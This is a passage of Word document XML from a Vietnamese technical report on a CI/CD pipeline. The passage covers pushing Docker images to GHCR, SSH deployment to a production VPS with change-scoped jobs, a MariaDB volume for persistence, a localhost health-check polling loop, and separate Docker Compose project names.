          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sau khi môi trường tạm thời vượt qua toàn bộ các bài kiểm tra với mã phản hồi HTTP 200, hệ thống tiến hành đóng gói các vùng chứa thành các Docker Image bất biến:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hình ảnh dịch vụ Web:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thẻ định danh phiên bản bất biến: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ghcr.io/wtfwhoyouare/inlaneweb:&lt;commit_sha&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thẻ định danh phiên bản mới nhất: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ghcr.io/wtfwhoyouare/inlaneweb:latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hình ảnh dịch vụ Cơ sở dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thẻ định danh phiên bản bất biến: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ghcr.io/wtfwhoyouare/inlaneweb-db:&lt;commit_sha&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thẻ định danh phiên bản mới nhất: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ghcr.io/wtfwhoyouare/inlaneweb-db:latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Việc đẩy các hình ảnh đã qua kiểm định lên GHCR đảm bảo nguyên tắc: một hình ảnh duy nhất được kiểm thử và đem đi triển khai trên toàn bộ các môi trường, loại bỏ hoàn toàn các sai khác do môi trường biên dịch gây ra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3.3. Tự động triển khai lên máy chủ Production tại Stage 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi Pull Request được hợp nhất thành công vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, quy trình chuyển giao liên tục tự động được kích hoạt thông qua kết nối mạng mã hóa bất đối xứng SSH sử dụng thuật toán khóa Ed25519:</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sequenceDiagram</w:t>
              <w:br/>
              <w:t xml:space="preserve">    autonumber</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant Runner as GitHub Actions Runner</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant VPS as Target Production VPS</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant GHCR as GitHub Container Registry (GHCR)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant MariaDB as MariaDB Engine (Persistent)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Note over Runner, VPS: Kết nối SSH Ed25519 an toàn qua GitHub Secrets</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Note over Runner, VPS: Hai Job triển khai chạy song song độc lập (Parallel DAG Execution)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    par Triển khai khối Giám sát (Job 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Runner-&gt;&gt;VPS: Phân tích thay đổi trong InlaneWeb/monitoring/</w:t>
              <w:br/>
              <w:t xml:space="preserve">        alt Có thay đổi cấu hình Giám sát</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Runner-&gt;&gt;VPS: docker compose -p inlaneweb-monitoring up -d</w:t>
              <w:br/>
              <w:t xml:space="preserve">            VPS--&gt;&gt;Runner: Cụm giám sát sẵn sàng hoạt động liên tục 24/7</w:t>
              <w:br/>
              <w:t xml:space="preserve">        else Bỏ qua nếu không có thay đổi hoặc chỉ sửa tài liệu</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Runner--&gt;&gt;Runner: Bỏ qua cập nhật để đảm bảo Zero-Downtime</w:t>
              <w:br/>
              <w:t xml:space="preserve">        end</w:t>
              <w:br/>
              <w:t xml:space="preserve">    and Triển khai khối Web Workload (Job 2)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Runner-&gt;&gt;VPS: Phân tích thay đổi trong InlaneWeb/web/ hoặc InlaneWeb/db/</w:t>
              <w:br/>
              <w:t xml:space="preserve">        alt Có thay đổi mã nguồn Web / DB</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Runner-&gt;&gt;VPS: Kéo hình ảnh mới nhất từ GHCR</w:t>
              <w:br/>
              <w:t xml:space="preserve">            VPS-&gt;&gt;GHCR: Kéo inlaneweb:${SHA} &amp; inlaneweb-db:${SHA}</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Runner-&gt;&gt;VPS: docker compose -p inlaneweb-prod up -d --remove-orphans</w:t>
              <w:br/>
              <w:t xml:space="preserve">            VPS-&gt;&gt;MariaDB: Gắn kết Docker Volume db_data bảo toàn dữ liệu</w:t>
              <w:br/>
              <w:t xml:space="preserve">            loop Vòng lặp thăm dò thích ứng (Tối đa 30 lần x 3s)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                Runner-&gt;&gt;VPS: Gửi yêu cầu curl tới http://127.0.0.1:8088/health</w:t>
              <w:br/>
              <w:t xml:space="preserve">                VPS--&gt;&gt;Runner: Phản hồi mã HTTP 200 OK</w:t>
              <w:br/>
              <w:t xml:space="preserve">            end</w:t>
              <w:br/>
              <w:t xml:space="preserve">        else Bỏ qua nếu không có thay đổi hoặc chỉ sửa tài liệu</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Runner--&gt;&gt;Runner: Bỏ qua rebuild để tiết kiệm tài nguyên máy chủ</w:t>
              <w:br/>
              <w:t xml:space="preserve">        end</w:t>
              <w:br/>
              <w:t xml:space="preserve">    end</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Runner--&gt;&gt;Runner: Hoàn tất chuyển giao liên tục mà không làm gián đoạn dịch vụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3.1. Chỉ cập nhật container có mã nguồn thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pipeline phân tích danh sách các tệp tin có sự thay đổi giữa commit hiện tại và commit liền trước theo từng phạm vi độc lập:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Commit chỉ chứa tài liệu kỹ thuật (`docs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.md`, `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.docx`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đường ống tự động phát hiện và bỏ qua toàn bộ công đoạn đóng gói tại Stage 3 và triển khai tại Stage 4, tiết kiệm 100% tài nguyên máy chủ và thời gian chạy CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay đổi hạ tầng quan sát:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nếu thay đổi chỉ xảy ra trong thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/monitoring/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, chỉ có Job triển khai giám sát được kích hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay đổi mã nguồn ứng dụng web:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nếu thay đổi xảy ra trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/web/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/db/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, chỉ có Job triển khai ứng dụng web được kích hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay đổi đồng thời hoặc bản phát hành lớn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cả hai Job đều được kích hoạt và chạy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>song song đồng thời</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parallel Execution), rút ngắn một nửa thời gian chờ đợi so với mô hình chạy tuần tự.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3.2. Giữ an toàn dữ liệu cơ sở dữ liệu bằng Docker Volume</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, vùng lưu trữ dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/var/lib/mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> của MariaDB được gắn kết cố định vào một Docker Named Volume mang tên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>db_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Trong suốt quá trình kéo image mới và tái tạo container, Docker Engine chỉ thực hiện tiêu hủy tầng tính toán tạm thời của container, toàn bộ dữ liệu vật lý trên ổ đĩa được bảo toàn nguyên vẹn 100%, loại bỏ nguy cơ mất mát dữ liệu khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3.3. Kiểm tra web hoạt động ổn định trước khi hoàn tất</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong các hệ thống phân tán, cơ sở dữ liệu thường cần từ 5 đến 20 giây để khởi động các tiến trình quản lý trang nhớ và kiểm tra bảng dữ liệu. Nếu kiểm tra trạng thái ngay lập tức, tiến trình kiểm tra sẽ báo lỗi giả. Pipeline đã cài đặt thuật toán kiểm tra nhịp tim vòng lặp:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện gửi tín hiệu thăm dò liên tục tới endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8088/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy chủ VPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khoảng cách giữa các lần thăm dò là $T = 3\text{s}$, với số lần thử tối đa $N = 30$ (tổng thời gian chịu lỗi tối đa 90 giây).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu nhận được phản hồi HTTP 200, tiến trình triển khai được công nhận thành công ngay lập tức. Nếu sau 90 giây endpoint vẫn không phản hồi, quy trình tự động trích xuất toàn bộ log của container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để lập tức thông báo sự cố cho kỹ sư vận hành.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3.4. Phân lập không gian dự án Docker Compose tránh xóa nhầm container</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi đặt cả hai tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker-compose.monitoring.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong cùng thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/opt/inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, mặc định Docker Compose sẽ gán tên project theo tên thư mục (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">). Do đó, cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
